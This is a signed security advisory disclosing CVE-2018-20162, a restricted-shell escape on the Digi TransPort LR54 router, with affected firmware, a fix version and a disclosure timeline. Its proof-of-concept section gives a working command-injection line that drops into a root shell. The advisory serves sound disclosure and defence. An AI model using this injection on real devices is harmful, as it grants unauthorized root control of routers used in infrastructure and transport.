Digi TransPort LR54 Restricted Shell Escape

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512  
  
CVE-2018-20162: Digi TransPort LR54 Restricted Shell Escape  
===========================================================  
  
The Digi TransPort LR54 is a high speed LTE router commonly used by industry,  
infrastructure, retail and public transportation.  
  
It supports running python scripts in a restricted sandbox, and has a custom  
shell accessible over SSH which is subjected to the same restrictions. The  
underlying OS is inaccessible to the administrator.  
  
Iave found a way to break out of the sandbox and obtaining a root shell by  
exploiting the way the cli handles command line arguments when executing python  
scripts:  
  
When an interactive python process receives a SIGINT (trough CTRL-C), arguments  
to the script are not properly escaped when passed to the interactive CLIas  
error logging handler. This allows an attacker to execute arbitrary commands as  
root.  
  
To exploit this vulnerability, an attacker needs to have interactive CLI access  
with asupera privileges. A user with this access level is enabled by default on  
the device.  
  
Vulnerable  
- ----------  
Digi Transport LR54 (and maybe related products like WR64 and WR54)  
  
Firmware Version : 4.4.0.26 10/29/2018 21:14:06  
Firmware Version : 4.3.2.24 09/06/2018 00:58:34  
  
And maybe earlier versions  
  
Migitation  
- ----------  
Users should upgrade to firmware version 4.5.1.4 or newer.  
  
Proof of Concept  
- ----------------  
1. Upload sleep.py to the LR54 using scp or sftp, containing:  
  
import time;time.sleep(10)  
  
2. Execute the following command in the LR54 cli:  
  
python sleep.py --XXX $(/bin/sh -i >&2)  
  
3. Immediately press CTRL-C after the program starts  
  
4. You are then dropped to an interactive root shel  
l  
/home/digi/user # uname -a  
Linux (none) 3.10.14 #1 SMP Mon Oct 29 16:18:10 CDT 2018 mips GNU/Linux  
/home/digi/user # id  
uid=0(root) gid=2000(users_rw) groups=2000(users_rw),2002(users_super)  
  
Timeline  
- --------  
2018-12-13: Vulnerability discovered  
2018-12-14: PoC created, Vendor notified  
2018-12-14: Vendor confirmed, 60 day embargo. Applied for CVE.  
2018-12-15: CVE-2018-20162 assigned  
2018-12-31: Received pre-release firmware. Confirmed not vulnerable.  
2019-01-02: Vendor releases fixed firmware 4.5.1.4  
2019-01-25: Vendor updated release notes to reference CVE-2018-20162  
2019-02-13: Vendor okaed disclosure, Embargo lifted  
  
References  
- ----------  
https://www.digi.com/products/networking/cellular-routers/digi-transport-lr54  
http://ftp1.digi.com/support/firmware/transport/LR54/v4.5.1.4/93001306_L.pdf  
https://www.digi.com/resources/security  
https://blog.hackeriet.no/cve-2018-20162-digi-lr54-restricted-shell-escape  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20162  
  
Credits  
- -------  
Vulnerability discovered by Stig Palmquist.  
  
Thanks to @duniel_pls and @alexanderkjall for reviewing this report.  
  
-----BEGIN PGP SIGNATURE-----  
  
iQIzBAEBCgAdFiEEj7OMIAQn+GdSU5z5EMg4owYJR3UFAlxpeAsACgkQEMg4owYJ  
R3XfMg//UDSALVhqqLc2Y7Yn8DxVOnSiFuobwPlseSKw0MigNbDbyBH6q8S9ozbe  
n1razr2tpPQPx24MGqniGxsKGDi+b0S1zayQxy2TePUA5B5axOuiZZt9qWIKeWHA  
HnAgjXN3x7Zv1yavJ/GxxlHJXOUCbOpMTeF32E26J4MssTJyEF1Q3p5YiF+/V2/b  
ne5x4hKsMbKpMmHSdCEb3CawqSZOl7/Wh8j/N5WayLTei7WBp8q9xVxBUBhpK1JR  
xUAClpsaiIKSSga1Q/QfXG9sTr/8/Kz6Mc3TD2YhZkEsujNP77N4ZwqByYB3wSMI  
B8MCrprIJUgGoiYlfg3yehXnj+SEkMgDXExPcy4B69sutCrXmfqfwh7EzynHgFDe  
mOPvpuYdHsxsWekoU8HN+Oux1iuJek0S5XL+5Lo/P+Tp1JXQ9dQU3wRN3ZfpjKqQ  
rP9jJDJVwE2rZHGsYyvMYvHZG0iPPLlq9T855z/13aZ7YDkRx5tvVb4m7ZVNLuxz  
6Z+J3CGktlPrilID6YBwrC+FotoAvJGrvWaYHXNEl7sQc5SJbazdZrQHBRF/i3zN  
1sntgI2AYyH7kx+hEwFkoaDaCM+Xsfm5sBJ9QC8OKZ315RYWvJAS0HXG1lmyXFYo  
u15TlfvsA9PcnAeHT4c/jLf24C8YyaFQ3YiZMmfnw12uiH+eOKE=  
=zEym  
-----END PGP SIGNATURE-----  
`